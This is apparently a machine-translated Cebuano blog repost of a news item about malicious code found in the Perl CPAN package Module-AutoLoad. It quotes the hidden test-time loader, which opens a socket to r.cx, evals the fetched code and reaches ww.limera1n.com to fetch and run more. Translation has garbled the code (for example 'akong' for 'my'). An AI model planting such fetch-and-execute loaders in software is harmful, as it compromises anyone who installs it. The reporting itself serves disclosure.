ProHoster > Π‘Π»ΠΎΠ³ > balita sa internet > Ang malisyoso nga code makita sa Module-AutoLoad Perl nga pakete

Ang malisyoso nga code makita sa Module-AutoLoad Perl nga pakete

Sa usa ka Perl nga pakete nga gipang-apod-apod pinaagi sa CPAN nga direktoryo Module-AutoLoad, gidisenyo aron awtomatikong i-load ang mga module sa CPAN sa langaw, giila malisyoso nga code. Ang malisyosong insert kay nakit-an sa test code 05_rcx.t, nga gipadala sukad sa 2011.
Mamatikdan nga ang mga pangutana bahin sa pagkarga sa kwestyonable nga code mitungha sa Stackoverflow balik sa 2016.

Ang malisyosong kalihokan nagsugod sa pagsulay sa pag-download ug pag-execute sa code gikan sa third-party server (http://r.cx:1/) atol sa pagpatuman sa test suite nga gilusad sa pag-instalar sa module. Gituohan nga ang code nga una nga gi-download gikan sa eksternal nga server dili malisyoso, apan karon ang hangyo gi-redirect ngadto sa ww.limera1n.com domain, nga naghatag sa iyang bahin sa code alang sa pagpatuman.

Aron maorganisar ang pag-download sa usa ka file 05_rcx.t Ang mosunod nga code gigamit:

akong $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
akong $try = `$^X $prog`;

Ang espesipikong kodigo maoy hinungdan nga ang script ipatuman ../contrib/RCX.pl, ang mga sulod niini gipakunhod ngadto sa linya:

gamita ang lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1β€³};

Kini nga script nag-load naglibog gamit ang serbisyo perlobfuscator.com code gikan sa external host r.cx (character codes 82.46.99.88 katumbas sa text "R.cX") ug ipatuman kini sa eval block.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1β€³; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE....}

Human sa pag-unpack, ang mosunod sa katapusan ipatuman: code:

print{$b=new IO::Socket::INET"ww.limera1n.com:80β€³}"GET /iJailBreak
"; evalor return warning$@while$b;1

Ang problema nga pakete gikuha na karon gikan sa repository. NAHUNONG (Perl Authors Upload Server), ug ang account sa tagsulat sa module gibabagan. Niini nga kaso, ang module nagpabilin gihapon magamit sa MetaCPAN archive ug mahimong direkta nga ma-install gikan sa MetaCPAN gamit ang pipila ka mga utilities sama sa cpanminus. Kini namatikdannga ang pakete dili kaylap nga giapod-apod.

Makapainteres nga hisgutan konektado ug ang tagsulat sa module, kinsa mihimakak sa impormasyon nga gisal-ot ang malisyoso nga code human gi-hack ang iyang site nga β€œr.cx” ug gipasabot nga naglingaw-lingaw lang siya, ug migamit sa perlobfuscator.com dili sa pagtago sa usa ka butang, apan sa pagpakunhod sa gidak-on. sa code ug pagpayano sa pagkopya niini pinaagi sa clipboard. Ang pagpili sa ngalan sa function nga "botstrap" gipatin-aw sa kamatuoran nga kini nga pulong "morag bot ug mas mubo kaysa bootstrap." Gipasalig usab sa tagsulat sa module nga ang giila nga mga pagmaniobra wala maghimo mga malisyoso nga aksyon, apan gipakita lamang ang pagkarga ug pagpatuman sa code pinaagi sa TCP.

Source: opennet.ru

Idugang sa usa ka comment